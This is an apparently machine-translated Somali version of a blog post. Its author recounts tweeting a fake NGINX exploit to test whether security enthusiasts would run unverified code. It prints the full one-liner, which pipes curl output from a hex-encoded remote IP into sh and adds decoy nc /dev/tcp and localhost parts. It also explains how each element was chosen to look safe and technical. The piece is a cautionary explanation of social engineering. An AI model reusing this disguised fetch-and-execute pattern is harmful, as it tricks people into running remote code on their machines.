Guusha tijaabada bulsheed ee ka faa'iidaysiga been abuurka ah ee nginx

Ogow. turjumi: qoraaga note asalka ah, daabacay on June 1, go'aansaday in ay sameeyaan tijaabo ka mid ah kuwa xiiseynaya ammaanka macluumaadka. Si tan loo sameeyo, wuxuu diyaariyey faa'iido been abuur ah oo loogu talagalay nuglaanta aan la shaacin ee server-ka shabakada wuxuuna ku dhajiyay Twitterkiisa. Male-awaalkiisa - in si dhakhso ah loo soo bandhigo khabiiro kuwaas oo arki doona khiyaanada cad ee code - ma aha oo kaliya ma rumoobaan ... Waxay dhaafeen dhammaan filashooyinka, iyo jihada ka soo horjeeda: tweet-ka ayaa helay taageero weyn oo ka yimid dad badan oo aan haysan hubi waxa ku jira.

TL;DR: Ha u isticmaalin dhuumaha feylka ee sh ama bash xaalad kasta ha ahaatee. Tani waa hab fiican oo aad ku lumin karto kontoroolka kombiyuutarkaaga.

Waxaan rabaa inaan idinla wadaago sheeko gaaban oo ku saabsan ka faa'iidaysiga majaajilada ah ee PoC ee la sameeyay Maajo 31-keedii. Isla markiiba waxa uu u soo muuqday isaga oo ka jawaabaya warkii Alisa Esage Shevchenko, xubin Hindisaha Maalinta Aaladda (ZDI), macluumaadka ku saabsan nuglaanshaha NGINX ee u horseedaya RCE (fulinta koodka fog) ayaa dhawaan la shaacin doonaa. Maadaama NGINX ay awood u leedahay shabakado badan, warku waa inuu ahaadaa bam. Laakiin dib u dhac ku yimid habka "muujinta mas'uulka ah", faahfaahinta waxa dhacay lama ogeyn - tani waa nidaamka ZDI ee caadiga ah.

Tweet ku saabsan muujinta nuglaanta ee NGINX

Markii aan dhammeeyey ka shaqeynta farsamo cusub oo qarsoodi ah oo ku jirta curlka, waxaan soo xigtay tweet-kii asalka ahaa oo waxaan " daadiyay PoC shaqeynaya " oo ka kooban hal xariiq oo kood ah oo loo maleynayo inuu ka faa'iideysanayo dayacanka la ogaaday. Dabcan, tani waxay ahayd wax aan macno lahayn. Waxaan u qaatay in isla markiiba la i soo bandhigi doono, iyo in sida ugu fiican aan heli doono dhowr retweets (oh si fiican).

Tweet ka faa'iidaysi been abuur ah

Si kastaba ha ahaatee, ma qiyaasi karin waxa xigay. Caannimadayda tweet-ka ayaa cirka isku shareertay. Waxaa la yaab leh, xilligan (15:00 Moscow wakhtiga Juun 1) dad yar ayaa ogaaday in tani ay tahay been abuur. Dad badan ayaa dib u soo gudbiya iyaga oo aan hubin haba yaraatee (iskaba daa in ay u bogeen sawirada quruxda badan ee ASCII ee ay soo saarto).

Bal eeg sida ay u qurux badan tahay!

In kasta oo dhammaan wareegyadan iyo midabadani ay aad u fiican yihiin, way caddahay in dadku ay ku qasbanaadeen inay ku shubaan koodka mashiinka si ay u arkaan. Nasiib wanaag, daalacayaashu waxay u shaqeeyaan si la mid ah, oo ay weheliso xaqiiqda ah in aanan runtii rabin in aan galo dhibaato sharci ah, koodka lagu aasay boggaygu wuxuu kaliya samayn jiray wicitaanada dhawaaqa iyada oo aan isku dayin in lagu rakibo ama fuliyo koodka dheeraadka ah.

Digression yar: netspooky, dnz, aniga iyo wiilasha kale ee kooxda Tuug Waxaan ku ciyaarnay habab kala duwan si aan u qariyo amarrada curlka in muddo ah hadda sababtoo ah waa qabow... waxaana nahay geeks. Netspooky iyo dnz waxay heleen dhowr habab oo cusub kuwaas oo ii muuqday kuwo aad ii ballan qaaday. Waxaan ku biiray madadaalo oo aan isku dayay in aan ku daro beddelka tobanlaha IP ee bacda khiyaamada. Waxaa soo baxday in IP sidoo kale loo rogi karo qaabka hexadecimal. Intaa waxaa dheer, curl iyo inta badan aaladaha kale ee NIX waxay si farxad leh u cunaan IP-yada hexadecimal! Markaa waxay ahayd arrin uun abuurista khad talis oo lagu qanci karo oo ammaan ah. Ugu dambayntii waxaan ku dejiyay kan:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Injineerinka-soo-electronic (SEE) waa ka badan yahay phishing-ka oo keliya

Badbaadada iyo aqoonta ayaa qayb weyn ka ahaa tijaabadan. Waxaan filayaa inay yihiin kuwii u horseeday guushiisa. Khadka talisku wuxuu si cad u tilmaamay amniga isagoo tixraacaya "127.0.0.1" (maqalka caanka ah). Localhost waxaa loo tixgaliyaa inay badbaado tahay xogta ku jirtana waligood kama tagin kumbuyuutarkaaga.

Aqoontu waxay ahayd qaybta labaad ee muhiimka ah ee SE ee tijaabada. Maaddaama dadka la beegsanayo ay ugu horreyn ka kooban yihiin dad aqoon u leh aasaaska amniga kombiyuutarka, waxay ahayd muhiim in la sameeyo kood si ay qaybo ka mid ah ugu muuqdaan kuwo la yaqaan oo la yaqaan (oo sidaas darteed ammaan ah). Amaahda walxihii fikradihii hore ee laga faa'iidaysanayay iyo in la isku daro si aan caadi ahayn ayaa la xaqiijiyay in ay tahay mid aad loogu guulaystay.

Hoos waxaa ku yaal falanqayn faahfaahsan oo ku saabsan hal-liner. Wax kasta oo liiskan ku jira ayaa xidhan dabeecadda la isku qurxiyo, oo dhab ahaantii waxba loogama baahna hawlgalkeeda dhabta ah.

Waa maxay qaybaha runtii lagama maarmaanka u ah? Tani -gsS, -O 0x0238f06a, |sh iyo server-ka laftiisa. Adeegaha shabakadu kuma jiraan wax tilmaamo xaasidnimo ah, laakiin waxay si fudud ugu adeegeen sawirada ASCII iyadoo la adeegsanayo amarada echo qoraalka ku jira index.html. Marka isticmaaluhu uu khadka la galay |sh dhexe ee, index.html raran oo la fuliyay. Nasiib wanaag, ilaaliyaasha server-ka shabakadu ma lahayn ujeedo xun.

• ../../../%00 - waxay ka dhigan tahay ka gudubka hagaha;
• ngx_stream_module.so - jidka loo maro moduleka NGINX random;
• /bin/sh%00<'protocol:TCP' - Sida la filayo waanu bilaabaynaa /bin/sh mashiinka bartilmaameedka ah oo u hagaaji wax soo saarka kanaalka TCP;
• -O 0x0238f06a#PLToffset - walxo qarsoodi ah, oo la kabo #PLToffset, si aad ugu ekaato sida kaydka xusuusta ee ku jira PLT;
• |sh; - qayb kale oo muhiim ah. Waxaan u baahnay inaan wax soo saarka u jiheyno sh/bash si aan u fulino koodka ka imaanaya server-ka weerka ee ku yaal 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - dummy kaas oo netcat loola jeedo /dev/tcp/localhostsi wax walba ugu muuqdaan ammaan mar kale. Dhab ahaantii, waxba ma qabato oo waxay ku jirtaa khadka quruxda.

Tani waxay soo gabagabaynaysaa dejinta qoraalka hal sadar ah iyo ka doodista qaybaha "injineernimada-soo-soo-saarka" (phishing-ga adag).

Habaynta Server-ka Shabakadda iyo Tallaabooyinka

Maaddaama inta badan macaamiishayda ay yihiin infosec / jabsadayaal, waxaan go'aansaday inaan ka dhigo server-ka webka in yar oo adkaysi u leh odhaahyada "xiisaha" dhinacooda, si ay raggu u helaan wax ay sameeyaan (oo ay ku farxi lahayd dhigay). Ma doonayo in aan halkan ku liis gareeyo dhammaan cilladaha maadaama ay tijaabadu wali socoto, laakiin kuwani waa dhawr waxyaalood oo serverku sameeyo:

• Wuxuu si firfircoon ula socdaa isku dayga qaybinta ee shabakadaha bulshada qaarkood wuxuuna beddelaa thumbnails kala duwan oo muuqaal ah si uu ugu dhiirrigeliyo isticmaaluhu inuu gujiyo isku xirka.
• Wuxuu u jiheeyaa Chrome/Mozilla/Safari/iwm fiidyaha xayaysiinta ee Thugcrowd halkii laga muujin lahaa qoraalka qolofka.
• Wuxuu daawadaa calamadaha muuqda ee faragelinta/bursiga cad, ka dibna wuxuu bilaabaa u wareejinta codsiyada adeegayaasha NSA (ha!).
• Ku rakibta Trojan, iyo sidoo kale rootkit-ka BIOS, dhammaan kombiyuutarada ay isticmaalayaashu booqdaan martida loo yahay browserka caadiga ah (kaliya kaftan!).

Qayb yar oo ka mid ah antimers

Xaaladdan oo kale, yoolka kaliya ee aan lahaa wuxuu ahaa inaan barto qaar ka mid ah sifooyinka Apache - gaar ahaan, xeerarka qabow ee codsiyada dib u habeynta - oo waxaan u maleeyay: maxaa diidaya?

NGINX Ka faa'iidayso (Run!)

Kusoo Biir @alisaesage on Twitter oo raac shaqada weyn ee ZDI ee wax ka qabashada dayacanka dhabta ah iyo ka faa'iidaysiga fursadaha NGINX. Shaqadoodu had iyo jeer way i soo jiitaan, waxaanan uga mahadcelinayaa Alice dulqaadkeeda dhammaan sheegistii iyo ogaysiisyada tweet-ka nacasnimada ah ee uu sababay. Nasiib wanaag, waxay sidoo kale samaysay xoogaa wanaagsan: waxay gacan ka gaysatay kor u qaadida wacyiga nuglaanshaha NGINX, iyo sidoo kale dhibaatooyinka ay sababto xadgudubka curlka.

Source: www.habr.com